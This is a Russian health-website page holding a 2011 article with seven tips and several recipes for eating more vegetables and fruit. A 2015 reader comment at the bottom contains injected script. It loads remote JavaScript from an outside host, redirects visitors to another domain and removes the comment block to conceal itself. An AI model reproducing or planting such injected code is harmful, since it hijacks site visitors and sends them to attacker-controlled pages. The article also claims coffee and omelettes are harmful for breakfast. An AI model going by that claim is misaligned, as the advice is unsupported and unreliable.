Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  7 способов есть больше ов...  >>  7 способов есть больше овощей и фруктов
 
Обратная связь
 

7 способов есть больше овощей и фруктов

Размер шрифта
18 октября 2011 07:02
  • google_analytics: false
  • Нравится

Вы не любите овощи?! Да вы просто не умеете их готовить! Перед вами семь способов научиться есть овощи и фрукты так, чтобы больше никогда не мечтать променять их на конфеты.


  1. Разнообразьте привычное меню

Добавьте, например, мелко потертую морковь к макаронам. Нехитрый способ начать есть больше овощей: просто увеличьте их количество в тех блюдах, к которым привыкли. Порежьте морковь кубиками и поставьте на стол. Если вдруг захочется что-то погрызть, вместо пирожных и плюшек у вас будет наготове вкусная и сладкая закуска.

Наш рецепт:

- Сладкий перец красный - 12 шт.

- Лук репчатый - 1 головка

- Морковь - 6 шт.

- Чеснок - 1 головка

- Рис - 1 стакан

- Зелень петрушки - 1 пучок

- Оливковое масло - 1/2 стакана

- Перец черный молотый , соль

  • Вырежьте плодоножки у перцев, удалите семена и перегородки.

  • Мелко порубите лук, чеснок крупно нарежьте, морковь натрите на крупной терке. Обжарьте лук на масле до прозрачности, добавьте чеснок и морковь.

  • Всыпьте рис, мелко нарезанную петрушку, посолите, поперчите, влейте стакан воды и готовьте на слабом огне, пока рис полностью не впитает жидкость, охладите.

  • Приготовленным фаршем заполните перец, уложите его на противень, смазанный маслом, запекайте 35-40 минут при 200 °С.

  1. Пробуйте новое

Яблоки и бананы каждый день надоедят даже самому трепетному их поклоннику. Время от времени балуйте себя манго, киви, личи. Пробуйте то, чего не пробовали: свежий инжир, айву.


  1. Пейте коктейли

Интересный и вкусный способ дотянуть до обеда – фруктовый коктейль, который при наличии блендера можно приготовить даже в офисе. Во-первых, сытно, а во-вторых – это же огромное поле для интересных экспериментов и необычных вкусов.

Наш рецепт:

- Три четверти стакана простого йогурта

- Полстакана ягод (клубника, черника и другие ягоды на ваш выбор)

- Половина спелого банана

- Половина стакана ананасового сока

- Столовая ложка льняного масла (в нем содержатся полезные Омега-3 ненасыщенные кислоты).

  • Смешайте все это в блендере, добавьте по вкусу корицу, мяту и ваниль и наслаждайтесь.


  1. Совмещайте несовместимое

Вы пробовали бутерброд из арахисового масла с бананом? Или смесь йогурта с фасолью? Попробуйте, не стесняйтесь открывать новое.

Наш рецепт:

- 400 граммов стручковой фасоли

- 50 граммов растительного масла

- 50 граммов репчатого лука

- 2 помидора

- 5 граммов муки

- Пол столовой ложки укропа

- Треть столовой ложки зелени петрушки

- 250 граммов йогурта

  • Фасоль промыть, очистить от волокон, выложить на пассерованный лук, посыпать сладким перцем, добавить нарезанные помидоры, нарезанные укроп и петрушку и посолить.

  • Тушить почти до готовности, заправить разбавленной в воде мукой и прокипятить. Фасоль в тарелке полить густым йогуртом.


  1. Фруктовое начало

Привычный завтрак – омлет и кофе? Откажитесь немедленно! Это вредно, а кроме того, скучно. Кофе будоражит нервную систему, и мы быстрее устаем в течение дня, а в омлете и желтках слишком много холестерина. Лучше быть спокойной и худой, чем нервной и толстой. Начинайте утро фруктами – подарите себе заряд хорошего настроения.


  1. Добавьте жару

Еще один способ найти новый вкус у привычных овощей и фруктов – это термическая обработка. Попробуйте сварить или испечь то, что вы никогда не варили и не пекли.

Наш рецепт:

- Одна цветная капуста

- 1 столовая ложка мягкого сыра

- Четверть стакана сыра «Пармезан»

  • Почистить и порезать цветную капусту на мелкие кусочки, проварить в течение 6-8 минут. Тщательно отряхнуть воду.

  • С помощью блендера или кухонного комбайна сделайте из еще горячей капусты пюре, добавив мягкий сыр, пармезан, толченый чеснок, соль и перец, пока вся масса не станет однородной.


  1. Сладкая жизнь

Попробуйте любой фрукт окунуть в горячий черный шоколад. Это будет не только здоровый десерт, но и очень необычное и вкусное блюдо.

Наш рецепт:

- 4 яйца

- 2 столовые ложки фруктозы

- 1 плитка шоколада от 70%

- 50 г какао-порошка

- 50 г измельченных миндальных орехов

- Ванилин на кончике ножа

  • Смешать какао-порошок с фруктозой и ванилином, добавить воды и готовить на водяной бане

  • В горячую смесь добавить шоколад кусочками и размешать

  • Отделить желтки от белков, белки взбить в пышную пену

  • Когда шоколадная смесь остынет, по чайной ложке ввести в нее взбитые белки

  • Разложить мусс по емкостям, посыпать орехами и поставить в холодильник на 5-6 часов.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:07

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.